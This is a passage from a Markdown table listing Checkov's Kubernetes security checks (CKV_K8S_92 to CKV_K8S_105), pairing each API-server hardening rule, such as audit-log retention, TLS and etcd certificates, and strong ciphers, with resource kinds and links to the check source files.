or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3107 | CKV_K8S_92 | resource | Pod | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3108 | CKV_K8S_92 | resource | PodTemplate | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3109 | CKV_K8S_92 | resource | ReplicaSet | Ensure that the 
--audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3110 | CKV_K8S_92 | resource | ReplicationController | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3111 | CKV_K8S_92 | resource | StatefulSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | -| 3112 | CKV_K8S_93 | resource | CronJob | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3113 | CKV_K8S_93 | resource | DaemonSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3114 | CKV_K8S_93 | resource | Deployment | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3115 | CKV_K8S_93 | resource | DeploymentConfig | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3116 | 
CKV_K8S_93 | resource | Job | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3117 | CKV_K8S_93 | resource | Pod | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3118 | CKV_K8S_93 | resource | PodTemplate | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3119 | CKV_K8S_93 | resource | ReplicaSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3120 | CKV_K8S_93 | resource | ReplicationController | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3121 | CKV_K8S_93 | resource | StatefulSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | -| 3122 | CKV_K8S_94 | resource | CronJob | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | 
[ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3123 | CKV_K8S_94 | resource | DaemonSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3124 | CKV_K8S_94 | resource | Deployment | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3125 | CKV_K8S_94 | resource | DeploymentConfig | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3126 | CKV_K8S_94 | resource | Job | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3127 | CKV_K8S_94 | resource | Pod | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3128 | CKV_K8S_94 | resource | PodTemplate | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3129 | CKV_K8S_94 | resource | ReplicaSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate 
| Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3130 | CKV_K8S_94 | resource | ReplicationController | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3131 | CKV_K8S_94 | resource | StatefulSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | -| 3132 | CKV_K8S_95 | resource | CronJob | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3133 | CKV_K8S_95 | resource | DaemonSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3134 | CKV_K8S_95 | resource | Deployment | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3135 | CKV_K8S_95 | resource | DeploymentConfig | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3136 | CKV_K8S_95 | resource | Job | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | 
[ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3137 | CKV_K8S_95 | resource | Pod | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3138 | CKV_K8S_95 | resource | PodTemplate | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3139 | CKV_K8S_95 | resource | ReplicaSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3140 | CKV_K8S_95 | resource | ReplicationController | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3141 | CKV_K8S_95 | resource | StatefulSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3142 | CKV_K8S_96 | resource | CronJob | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3143 | CKV_K8S_96 | resource | DaemonSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | 
[ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3144 | CKV_K8S_96 | resource | Deployment | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3145 | CKV_K8S_96 | resource | DeploymentConfig | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3146 | CKV_K8S_96 | resource | Job | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3147 | CKV_K8S_96 | resource | Pod | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3148 | CKV_K8S_96 | resource | PodTemplate | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3149 | CKV_K8S_96 | resource | ReplicaSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3150 | CKV_K8S_96 | resource | ReplicationController | Ensure that the --service-account-lookup argument is set to true | 
Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3151 | CKV_K8S_96 | resource | StatefulSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3152 | CKV_K8S_97 | resource | CronJob | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3153 | CKV_K8S_97 | resource | DaemonSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3154 | CKV_K8S_97 | resource | Deployment | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3155 | CKV_K8S_97 | resource | DeploymentConfig | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3156 | CKV_K8S_97 | resource | Job | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3157 | CKV_K8S_97 | resource | Pod | Ensure that 
the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3158 | CKV_K8S_97 | resource | PodTemplate | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3159 | CKV_K8S_97 | resource | ReplicaSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3160 | CKV_K8S_97 | resource | ReplicationController | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3161 | CKV_K8S_97 | resource | StatefulSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3162 | CKV_K8S_99 | resource | CronJob | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3163 | CKV_K8S_99 | resource | DaemonSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | 
[ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3164 | CKV_K8S_99 | resource | Deployment | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3165 | CKV_K8S_99 | resource | DeploymentConfig | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3166 | CKV_K8S_99 | resource | Job | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3167 | CKV_K8S_99 | resource | Pod | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3168 | CKV_K8S_99 | resource | PodTemplate | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3169 | CKV_K8S_99 | resource | ReplicaSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3170 | CKV_K8S_99 | resource | ReplicationController | Ensure that the --etcd-certfile and 
--etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3171 | CKV_K8S_99 | resource | StatefulSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3172 | CKV_K8S_100 | resource | CronJob | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3173 | CKV_K8S_100 | resource | DaemonSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3174 | CKV_K8S_100 | resource | Deployment | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3175 | CKV_K8S_100 | resource | DeploymentConfig | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3176 | CKV_K8S_100 | resource | Job | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | 
[ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3177 | CKV_K8S_100 | resource | Pod | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3178 | CKV_K8S_100 | resource | PodTemplate | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3179 | CKV_K8S_100 | resource | ReplicaSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3180 | CKV_K8S_100 | resource | ReplicationController | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3181 | CKV_K8S_100 | resource | StatefulSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3182 | CKV_K8S_102 | resource | CronJob | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3183 | CKV_K8S_102 | resource | DaemonSet | Ensure that the --etcd-cafile 
argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3184 | CKV_K8S_102 | resource | Deployment | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3185 | CKV_K8S_102 | resource | DeploymentConfig | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3186 | CKV_K8S_102 | resource | Job | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3187 | CKV_K8S_102 | resource | Pod | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3188 | CKV_K8S_102 | resource | PodTemplate | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3189 | CKV_K8S_102 | resource | ReplicaSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3190 | CKV_K8S_102 | resource | ReplicationController | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | 
[ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3191 | CKV_K8S_102 | resource | StatefulSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3192 | CKV_K8S_104 | resource | CronJob | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3193 | CKV_K8S_104 | resource | DaemonSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3194 | CKV_K8S_104 | resource | Deployment | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3195 | CKV_K8S_104 | resource | DeploymentConfig | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3196 | CKV_K8S_104 | resource | Job | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3197 | CKV_K8S_104 | resource | Pod | Ensure that encryption providers are appropriately configured | Kubernetes | 
[ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3198 | CKV_K8S_104 | resource | PodTemplate | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3199 | CKV_K8S_104 | resource | ReplicaSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3200 | CKV_K8S_104 | resource | ReplicationController | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3201 | CKV_K8S_104 | resource | StatefulSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3202 | CKV_K8S_105 | resource | CronJob | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3203 | CKV_K8S_105 | resource | DaemonSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3204 | CKV_K8S_105 | resource | Deployment | Ensure that the API Server only 
makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3205 | CKV_K8S_105 | resource | DeploymentConfig | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3206 | CKV_K8S_105 | resource | Job | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3207 | CKV_K8S_105 | resource | Pod | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3208 | CKV_K8S_105 | resource | PodTemplate | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3209 | CKV_K8S_105 | resource | ReplicaSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3210 | CKV_K8S_105 | resource | ReplicationController | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | 
